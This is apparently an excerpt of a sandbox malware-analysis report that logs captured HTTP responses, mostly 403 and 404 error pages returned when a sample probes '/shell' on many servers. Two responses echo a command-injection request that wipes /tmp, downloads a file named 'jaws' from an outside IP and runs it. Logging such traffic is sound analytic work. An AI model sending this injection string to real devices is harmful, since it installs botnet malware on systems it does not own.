Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 01 Nov 2021 09:08:39 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 207Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 73 68 65 6c 6c 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /shellon this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 05:05:55 GMTServer: WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:08:39 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:08:43 GMTServer: ApacheAccept-Ranges: bytesVary: Accept-Encoding,User-AgentCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Keep-Alive: timeout=1, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: thttpd/2.25b 29dec2003Content-Type: text/html; charset=UTF-8Date: Sat, 17 Oct 2015 00:23:52 GMTLast-Modified: Sat, 17 Oct 2015 00:23:52 GMTAccept-Ranges: bytesConnection: closeCache-Control: no-cache,no-storeData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 32 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 48 32 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 27 2f 73 68 65 6c 6c 3f 63 64 2b 2f 74 6d 70 3b 72 6d 2b 2d 72 66 2b 2a 3b 77 67 65 74 2b 34 39 2e 31 32 2e 32 33 33 2e 35 32 2f 6a 61 77 73 3b 73 68 2b 2f 74 6d 70 2f 6a 61 77 73 27 20 72 65 73 6f 6c 76 65 73 20 74 6f 20 61 20 66 69 6c 65 20 70 6c 75 73 20 43 47 49 2d 73 74 79 6c 65 20 70 61 74 68 69 6e 66 6f 2c 20 62 75 74 20 74 68 65 20 66 69 6c 65 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 43 47 49 20 66 69 6c 65 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 74 68 74 74 70 64 2f 22 3e 74 68 74 74 70 64 2f 32 2e 32 35 62 20 32 39 64 65 63 32 30 30 33 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>403 Forbidden</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H2>403 Forbidden</H2>The requested URL '/shell?cd+/tmp;rm+-rf+*;wget+49.12.233.52/jaws;sh+/tmp/jaws' resolves to a file plus CGI-style pathinfo, but the file is not a valid CGI file.<HR><ADDRESS><A HREF="http://www.acme.com/software/thttpd/">thttpd/2.25b 29dec2003</A></ADDRESS></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Mon, 01 Nov 2021 09:08:51 GMTContent-Type: text/htmlContent-Length: 167Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: Mini web server 1.0 ZTE corp 2005.Content-Type: text/html; charset=iso-8859-1Accept-Ranges: bytesConnection: closeCache-Control: no-cache,no-storeData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 54 4d 4c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 32 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <HTML> <HEAD><TITLE>404 Not Found</TITLE></HEAD> <BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"> <H2>404 Not Found</H2>The requested URL was not found on this server.</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:08:51 GMTServer: ApacheContent-Length: 255Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 05:09:54 GMTServer: webserverX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockContent-Length: 181Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=8, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6c 6f 63 61 74 65 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 73 68 65 6c 6c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't locate document: /shell</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:08:51 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: thttpd/2.25b 29dec2003Content-Type: text/html; charset=UTF-8Date: Sat, 17 Oct 2015 00:23:54 GMTLast-Modified: Sat, 17 Oct 2015 00:23:54 GMTAccept-Ranges: bytesConnection: closeCache-Control: no-cache,no-storeData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 32 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 48 32 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 27 2f 73 68 65 6c 6c 3f 63 64 2b 2f 74 6d 70 3b 72 6d 2b 2d 72 66 2b 2a 3b 77 67 65 74 2b 34 39 2e 31 32 2e 32 33 33 2e 35 32 2f 6a 61 77 73 3b 73 68 2b 2f 74 6d 70 2f 6a 61 77 73 27 20 72 65 73 6f 6c 76 65 73 20 74 6f 20 61 20 66 69 6c 65 20 70 6c 75 73 20 43 47 49 2d 73 74 79 6c 65 20 70 61 74 68 69 6e 66 6f 2c 20 62 75 74 20 74 68 65 20 66 69 6c 65 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 43 47 49 20 66 69 6c 65 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 74 68 74 74 70 64 2f 22 3e 74 68 74 74 70 64 2f 32 2e 32 35 62 20 32 39 64 65 63 32 30 30 33 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>403 Forbidden</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H2>403 Forbidden</H2>The requested URL '/shell?cd+/tmp;rm+-rf+*;wget+49.12.233.52/jaws;sh+/tmp/jaws' resolves to a file plus CGI-style pathinfo, but the file is not a valid CGI file.<HR><ADDRESS><A HREF="http://www.acme.com/software/thttpd/">thttpd/2.25b 29dec2003</A></ADDRESS></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0Date: Mon, 01 Nov 2021 09:08:53 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 7
